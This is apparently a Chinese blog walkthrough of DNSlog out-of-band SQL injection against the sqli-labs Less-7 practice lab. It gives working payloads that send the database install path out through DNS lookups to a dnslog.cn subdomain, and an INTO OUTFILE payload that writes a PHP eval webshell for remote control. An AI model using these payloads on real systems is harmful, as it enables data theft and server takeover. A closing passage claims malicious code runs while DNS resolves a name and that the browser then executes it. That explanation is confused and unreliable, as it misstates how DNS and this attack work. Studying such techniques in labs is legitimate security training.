DNSlog注入思路

之前看到的思路今天来整整^^;
dnslog网址:http://www.dnslog.cn/

拿我们熟悉的sqli-labs,第7关来开刀^^;
在这里插入图片描述
正常显示:
在这里插入图片描述
错误显示:
在这里插入图片描述
猜测到注入点是字符型,单引号加两个小括号,?id=1’))
在这里插入图片描述

OK那接下来在用dnslog之前得看一下mysql中secure_file_priv变量得值;
因为配置值不同会产生影响:
在这里插入图片描述
修改这个变量值可以通过my.ini去进行修改,如果my.ini没有这个变量自行加上即可。
修改完记得重启然后检查一下是否修改成功:
在这里插入图片描述
接下来就可以利用读文件函数load_file(),结合dnslog.cn网站,实现带外攻击。
构造payload:
在这里插入图片描述
虽然执行完页面还是会显示报错,但不影响获取结果:
在这里插入图片描述
拿完库名接下来的表名等自行修改即可。

还可以通过dnslog 来获取文件路径:
构造payload为:
http://localhost/sqli-labs/Less-7/?id=1’)) and load_file(concat(’\\’,(substr(hex(@@basedir),1,30)),’.umgkxt.dnslog.cn\coke’)) --+

http://localhost/sqli-labs/Less-7/?id=1’)) and load_file(concat(’\\’,(substr(hex(@@basedir),31,30)),’.umgkxt.dnslog.cn\coke’)) --+

在这里插入图片描述
然后拼接起来十六进制解码得出:
在这里插入图片描述
在这里插入图片描述
获取到文件路径可以进行写入文件了;
构造语句:?id=-1’)) union select 1,2,’<?php @eval($_REQUEST[coke])?>’ into outfile ‘D:\phpstudy\phpstudy_pro\WWW\99.php’ --+
来到网站目录下,发现写入成功:在这里插入图片描述
也可以使用into dumpfile来写入;
然后通过菜刀,蚁剑等工具进行连接即可。

DNSLog注入是一种利用DNS协议的安全漏洞进行攻击的方法。它利用了DNS服务器对于域名解析请求的处理方式,通过在恶意构造的域名中插入恶意代码,从而实现对目标系统的攻击或信息收集。 具体的注入原理如下: 1. DNS解析过程:当用户在浏览器中输入一个URL并发送请求时,操作系统会将URL发送给本地DNS服务器进行解析。DNS服务器会向根域名服务器发起查询请求,逐级查询直到找到对应的IP地址。 2. 恶意域名构造:攻击者构造一个恶意域名,其中包含了恶意代码或者指向恶意服务器的IP地址。恶意代码可以是任意可执行的代码,如JavaScript代码、Shell命令等。 3. DNS解析注入:攻击者向本地DNS服务器发送一个查询请求,并在请求中包含恶意域名。本地DNS服务器在解析该域名时,会向上级DNS服务器发起查询请求,直到找到对应的IP地址。在这个查询过程中,恶意代码会被执行。 4. 恶意代码执行:当上级DNS服务器将查询结果返回给本地DNS服务器时,本地DNS服务器会将结果返回给用户的操作系统。操作系统接收到结果后,会将其交给浏览器进行处理。如果结果中包含恶意代码,浏览器会执行该代码。 通过以上的注入原理,攻击者可以实现对目标系统的攻击,如执行恶意脚本、获取敏感信息等。为了防止DNSLog注入攻击,可以采取一些安全措施,如使用DNSSEC来验证DNS响应的真实性、限制DNS解析的递归查询等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值